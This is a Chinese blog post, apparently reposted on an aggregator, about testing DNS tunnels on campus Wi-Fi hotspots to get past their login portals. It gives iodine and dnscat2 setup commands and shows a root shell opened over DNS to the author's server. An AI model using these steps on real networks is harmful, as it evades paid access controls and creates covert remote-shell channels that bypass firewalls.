DNS隧道测试
来源:互联网 发布:mysql数据库基础面试题 编辑:程序博客网 时间:2024/04/30 02:10
我先连上CMCC-EDU,然后就发现路由表变了。
➜ ~ route -n [20:18:44]Kernel IP routing tableDestination Gateway Genmask Flags Metric Ref Use Iface0.0.0.0 192.168.170.2 0.0.0.0 UG 0 0 0 eth00.0.0.0 10.254.47.1 0.0.0.0 UG 600 0 0 wlan010.254.47.0 0.0.0.0 255.255.255.0 U 600 0 0 wlan0192.168.170.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0218.207.3.4 10.254.47.1 255.255.255.255 UGH 600 0 0 wlan0
然后发现DNS服务器也变了,通过/etc/resolv.conf
配置文件的修改时间来看,应该是连接上热点之后被修改的。
➜ ~ cat /etc/resolv.conf [20:19:05]# Generated by NetworkManagernameserver 218.201.17.2nameserver 218.201.4.3➜ ~ ll /etc/resolv.conf [20:19:12]lrwxrwxrwx 1 root root 35 Apr 11 20:17 /etc/resolv.conf -> /var/run/NetworkManager/resolv.conf
而之前我的DNS服务器设置的是默认的宿主机的一个虚拟IP(192.168.170.2)。
➜ ~ cat /etc/resolv.conf [20:45:49]domain localdomainsearch localdomainnameserver 192.168.170.2
宿主机的IP是192.168.170.1
我先在我的kali上断开与宿主机的联系,只通过无线网卡与外界联系(通过连接上CMCC-EDU热点)
ifconfig eth0 down
连接热点之后,得到一个内网IP
➜ ~ ifconfig [20:23:20]lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 inet6 ::1 prefixlen 128 scopeid 0x10<host> loop txqueuelen 1 (Local Loopback) RX packets 6602 bytes 4772279 (4.5 MiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 6602 bytes 4772279 (4.5 MiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 10.254.47.32 netmask 255.255.255.0 broadcast 10.254.47.255 inet6 fe80::3abe:7cf0:785a:1bba prefixlen 64 scopeid 0x20<link> ether 80:1f:02:ed:14:d8 txqueuelen 1000 (Ethernet) RX packets 36 bytes 5250 (5.1 KiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 3128 bytes 251697 (245.7 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
网关是
➜ ~ route -n [20:20:31]Kernel IP routing tableDestination Gateway Genmask Flags Metric Ref Use Iface0.0.0.0 10.254.47.1 0.0.0.0 UG 600 0 0 wlan010.254.47.0 0.0.0.0 255.255.255.0 U 600 0 0 wlan0218.207.3.4 10.254.47.1 255.255.255.255 UGH 600 0 0 wlan0
然后虽然不能返回HTTP响应,也ping不通baidu.com,但是DNS还是成功的。
➜ ~ curl 10.254.47.1 [20:21:17]curl: (52) Empty reply from server➜ ~ dig baidu.com @218.201.17.2 [20:21:23]; <<>> DiG 9.10.3-P4-Debian <<>> baidu.com @218.201.17.2;; global options: +cmd;; Got answer:;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 19904;; flags: qr rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 0, ADDITIONAL: 1;; OPT PSEUDOSECTION:; EDNS: version: 0, flags:; udp: 4096;; QUESTION SECTION:;baidu.com. IN A;; ANSWER SECTION:baidu.com. 10252 IN A 111.13.101.208baidu.com. 10252 IN A 180.149.132.47baidu.com. 10252 IN A 123.125.114.144baidu.com. 10252 IN A 220.181.57.217;; Query time: 5 msec;; SERVER: 218.201.17.2#53(218.201.17.2);; WHEN: Tue Apr 11 20:21:54 CST 2017;; MSG SIZE rcvd: 102➜ ~ ping 180.149.132.47 [20:21:54]PING 180.149.132.47 (180.149.132.47) 56(84) bytes of data.^C--- 180.149.132.47 ping statistics ---6 packets transmitted, 0 received, 100% packet loss, time 5105ms➜ ~ dig mydomain.me @218.201.17.2 [20:22:08]; <<>> DiG 9.10.3-P4-Debian <<>> mydomain.me @218.201.17.2;; global options: +cmd;; Got answer:;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 45846;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1;; OPT PSEUDOSECTION:; EDNS: version: 0, flags:; udp: 4096;; QUESTION SECTION:;mydomain.me. IN A;; ANSWER SECTION:mydomain.me. 10723 IN A 123.my.i.p;; Query time: 1041 msec;; SERVER: 218.201.17.2#53(218.201.17.2);; WHEN: Tue Apr 11 20:22:25 CST 2017;; MSG SIZE rcvd: 55
于是我想,能不能用DNS隧道呢?
服务器端已经配置好了,用iodine
sudo iodined -f 192.168.77.1 ns.mydomain.me -P mypassword
接下来是我的kali客户端。
➜ ~ iodine -f -P mypassword 123.my.i.p ns.mydomain.me [1:57:54]Opened dns0Opened IPv4 UDP socketSending DNS queries for ns.mydomain.me to 123.my.i.pAutodetecting DNS query type (use -T to override).....................iodine: No suitable DNS query type found. Are you connected to a network?iodine: If you expect very long roundtrip delays, use -T explicitly.iodine: (Also, connecting to an "ancient" version of iodined won't work.)
然而并没有成功。果然CMCC-EDU安全方便做的比学校好一些。虽然CMCC-EDU可以用反向DNS shell
尝试CQUPT无线网
这不,刚连上CQUPT,DNS服务器就被改了
➜ ~ cat /etc/resolv.conf [1:08:47]# Generated by NetworkManagersearch cqupt.edu.cnnameserver 61.128.128.68nameserver 202.202.32.33nameserver 202.202.32.34
但是当我使用CQUPT无线网的时候就成功了。果然学校自己弄的无线网就不怎么安全严谨(想到之前有一段时间本来就可以免费上网来着,后来又禁了)
使用dnscat
服务端
$ git clone https://github.com/iagox86/dnscat2.git$ cd dnscat2/server/$ gem install bundler$ bundle install$ sudo ruby ./dnscat2.rb ns.mydomain.me
客户端
Linux/Unix下需要先下载源码再编译
$ git clone https://github.com/iagox86/dnscat2.git$ cd dnscat2/client/$ make
编译成功之后,
注意,传输过程中,会经常出现这个
[[ ERROR ]] :: DNS: RCODE_REFUSED[[ ERROR ]] :: DNS: RCODE_REFUSED[[ ERROR ]] :: DNS: RCODE_REFUSED[[ ERROR ]] :: DNS: RCODE_REFUSED[[ ERROR ]] :: The server hasn't returned a valid response in the last 20 attempts.. closing session.[[ ERROR ]] :: DNS: RCODE_REFUSED[[ ERROR ]] :: The server hasn't returned a valid response in the last 20 attempts.. closing session.[[ WARNING ]] :: exec driver shut down; killing process 35257[[ ERROR ]] :: DNS: RCODE_REFUSED[[ FATAL ]] :: There are no active sessions left! Goodbye![[ WARNING ]] :: Terminating
最后如果服务器在最后的20次尝试中都没有发出指令的话,客户端会关闭(如上)。
成功得到shell
kali客户端
Encrypted session established! For added security, please verify the server also displays this string:Strode Teeth Plight Push Story Yerba Session established!
服务端
>> Strode Teeth Plight Push Story YerbaThis is a console session!That means that anything you type will be sent as-is to theclient, and anything they type will be displayed as-is on thescreen! If the client is executing a command and you don'tsee a prompt, try typing 'pwd' or something!To go back, type ctrl-z.sh (kali) 2> cat /etc/issuesh (kali) 2> Kali GNU/Linux Rolling \n \lsh (kali) 2> idsh (kali) 2> uid=0(root) gid=0(root) groups=0(root)sh (kali) 2>
其中218.201.17.2
是这个CMCC的DNS服务器。
在kali上用wireshark抓到的全是DNS流量。
参考:
利用 DNS 隧道传递数据和命令来绕过防火墙
题外话
打开wireshark之后,发现本机尝试与某个IP(52.39.237.157)建立TCP连接,于是查了一下,最后怀疑是我打开的firefox浏览器由于之前没有访问到api.ipify.org ,然后现在在重试,通过用ipip验证应该这个IP就是api.ipify.org的IP。也许这是firefox的策略。未连接上就会在一段时间之后重试。
➜ reGeorg master ✓ ipip 52.39.237.157 [20:24:27] 美国俄勒冈州波特兰 amazon.com➜ reGeorg master ✓ ipip api.ipify.org [20:24:31] 美国弗吉尼亚州阿什本 amazon.com
- DNS隧道测试
- DNS隧道
- DNS隧道和ICMP隧道
- DNS隧道工具dns2tcp
- DNS隧道的搭建
- DNS隧道工具iodine
- DNS隧道之DNS2TCP实现
- DNS隧道技术绕防火墙
- DNS隧道之突破运营商认证
- 通过DNS隧道来控制Meterpreter
- DNS隧道制造工具——iodine
- DNS隧道技术绕过上网认证限制
- DNS+SSH混合隧道实战-------iodine,ssh
- DNS+tunnel(DNS隧道)技术-DNS2tcp的使用方法及原理
- 【安全牛学习笔记】DNS协议隧道、DNS协议隧道-dns2tcp
- IPv6的ISATAP隧道和6to4隧道测试
- [黑科技]DNS隧道-绕过wifi热点登陆免费上网
- 利用 DNS 隧道传递数据和命令来绕过防火墙
- selenium+python+eclipse自动化之旅
- 库函数中的串处理函数
- 名企笔试:2015小米暑期实习笔试题(二进制) 2017-04-05 算法爱好者
- Python背景色与语法高亮主题配置
- gem5中O3模式下fetch_impl.hh源代码详细分析
- DNS隧道测试
- error redefinition of 'xxx' 问题解决
- 堆排序算法详解
- 理解java的三大特性之继承
- onethink快速开发独立模块
- 分享几个我常用的ACM网站
- RactiveJS-01 Hello Ractive
- 【APIO2014】Split the sequence
- 杭电oj(java版)——1003 Max Sum